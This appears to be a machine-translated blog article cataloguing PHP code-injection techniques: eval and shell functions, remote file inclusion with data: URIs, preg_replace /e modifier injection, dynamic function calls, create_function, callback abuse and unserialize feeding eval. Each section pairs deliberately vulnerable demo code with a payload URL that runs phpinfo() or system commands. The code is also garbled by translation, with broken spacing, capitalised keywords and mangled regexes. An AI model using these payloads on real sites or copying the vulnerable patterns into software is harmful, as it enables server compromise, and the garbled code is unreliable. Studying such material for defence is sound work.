A feast for PHP Security enthusiasts the Month of PHP Security. I read a lot of articles on php-security and shared them. They are all idols.
Code execution function
Functions that can execute code in PHP. Such as eval (), assert (), '', system (), exec (), shell_exec (), passthru (), escapeshellcmd (), pcntl_exec (), etc.
Demo code 1.1:
<? Php
Echo 'dir ';
?>
2. File Inclusion code injection
File contains code injection of functions under specific conditions, such as include (), include_once (), require (), and require_once ().
When allow_url_include = On and PHP Version> = 5.2.0, code injection occurs.
Demo code 2.1:
<? Php
Include ($ _ GET [a]);
?>
Access http: // 127.0.0.1/include. php? A = data: text/plain, % 3C? Php % 20 phpinfo % 28% 29 ;? % 3E:
Run phpinfo ().
Three-Regular Expression matching code injection
Code injection caused by the well-known preg_replace () function. When the/e pattern modifier exists in pattern, code execution is allowed. We will discuss this in three cases.
3.1 preg_replace () pattern parameter Injection
Pattern is the code injection of the first parameter.
When magic_quotes_gpc = Off, the code is executed.
Demo code 3.1:
<? Php
Echo $ regexp = $ _ GET [reg];
$ Var = <php> phpinfo () </php>;
Preg_replace ("/<php> (.*?) $ Regexp ", \ 1, $ var );
?>
Access http: // 127.0.0.1/preg_replace1.php? Reg = % 3C/php % 3E/e that is
Run phpinfo ().
3.2 preg_replace () replacement parameter Injection
Replacement is the code injection of the second parameter, resulting in code execution.
Demo code 3.2:
<?
Preg_replace ("/menzhi007/e", $ _ GET [h], "jutst test ");
?>
When we submit http: // 127.0.0.1/preg_replace2.php? H = phpinfo () that is
Run phpinfo ().
3.3 preg_replace () injection of the third parameter
We construct the subject parameter to execute the code. Submit: http: // 127.0.0.1/preg_replace3.php? H = [php] phpinfo () [/php]
Or http: // 127.0.0.1/preg_replace3.php? H = [php] $ {phpinfo % 28% 29} [/php] cause code execution
Demo code 3.3:
<?
Preg_replace ("/s * [php] (. + ?) [/Php] s */ies "," \ 1 ", $ _ GET [h]);
?>
4. Dynamic Code Execution
4.1 dynamic variable Code Execution
Demo code 4.1:
<? Php
$ Dyn_func = $ _ GET [dyn_func];
$ Argument = $ _ GET [argument];
$ Dyn_func ($ argument );
?>
We submit http: // 127.0.0.1/dyn_func.php? Dyn_func = system & argument = ipconfig execute the ipconfig command
4.2 Dynamic Function Code Execution
Demo code 4.2:
<? Php
$ Foobar = $ _ GET [foobar];
$ Dyn_func = create_function ($ foobar, "echo $ foobar ;");
$ Dyn_func ();
?>
We submit http: // 127.0.0.1/create_function.php? Foobar = system % 28dir % 29 run the dir command
Five others
5.1 code execution of the ob_start () function
Demo code 5.1:
<? Php
$ Foobar = system;
Ob_start ($ foobar );
Echo dir;
Ob_end_flush ();
?>
5.2 code execution of the array_map () function
Demo code 5.2:
<? Php
$ Evil_callback =$ _ GET [callback];
$ Some_array = array (0, 1, 2, 3 );
$ New_array = array_map ($ evil_callback, $ some_array );
?>
We submit http: // 127.0.0.1/array_map.php? Callback = phpinfo: Execute phpinfo ().
5.3 unserialize () and eval ()
Unserialize () is a function with high usage in PHP. Improper use of unserialize () may cause security risks.
(Black brother that challenge 2 html "> http://hi.baidu.com/hi_heige/blog/item/505b2828da5b18f499250a9b.html)
Demo code 5.3:
<? Php
Class Example {
Var $ var =;
Function _ destruct (){
Eval ($ this-> var );
}
}
Unserialize ($ _ GET [saved_code]);
?>
We submit http: // 127.0.0.1/unserialize. php? Saved_code = O: 7: % 22 Example % 22: 1: {s: 3: % 22var % 22; s: 10: % 22 phpinfo % 28% 29; % 22 ;} execute phpinfo ().
5.4 functions that may easily cause security problems
There are many functions of the same type
Array_map ()
Usort (), uasort (), uksort ()
Array_filter ()
Array_reduce ()
Array_diff_uassoc (), array_diff_ukey ()
Array_udiff (), array_udiff_assoc (), array_udiff_uassoc ()
Array_intersect_assoc (), array_intersect_uassoc ()
Array_uintersect (), array_uintersect_assoc (), array_uintersect_uassoc ()
Array_walk (), array_pai_recursive ()
Xml_set_character_data_handler ()
Xml_set_default_handler ()
Xml_set_element_handler ()
Xml_set_end_namespace_decl_handler ()
Xml_set_external_entity_ref_handler ()
Xml_set_notation_decl_handler ()
Xml_set_processing_instruction_handler ()
Xml_set_start_namespace_decl_handler ()
Xml_set_unparsed_entity_decl_handler ()
Stream_filter_register ()
Set_error_handler ()
Register_shutdown_function ()
Register_tick_function ()